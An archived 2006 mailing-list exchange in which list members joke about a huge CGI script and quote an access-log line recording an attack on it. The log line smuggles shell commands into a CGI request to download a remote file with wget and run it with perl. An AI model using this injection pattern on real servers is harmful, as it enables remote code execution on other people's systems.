Aaron Trevena aaron.trevena at
Wed Mar 8 09:38:01 GMT 2006

On 08/03/06, Jonathan Stowe <jns at> wrote:
> On Wed, 2006-03-08 at 08:45, Jonathan McKeown wrote:
> > A 10Kline CGI script, with most variables global and including its own CGI
> > parameter parsing.
> I'd say it has a widely known an exploitable flaw:
> access.log: - - [08/Mar/2005:15:51:21 +0000] "GET /cgi-bin/|echo%20;cd%20/tmp;wget%20http://;perl%20sess_3539283e27d73cae29fe2b80f9293f57;pwd;echo%20;echo|

Yeah - I see that a lot in my logs, and that is most of the reason I
generate static html every night - that and its a lot less work for my
poor little virtual server.


More information about the mailing list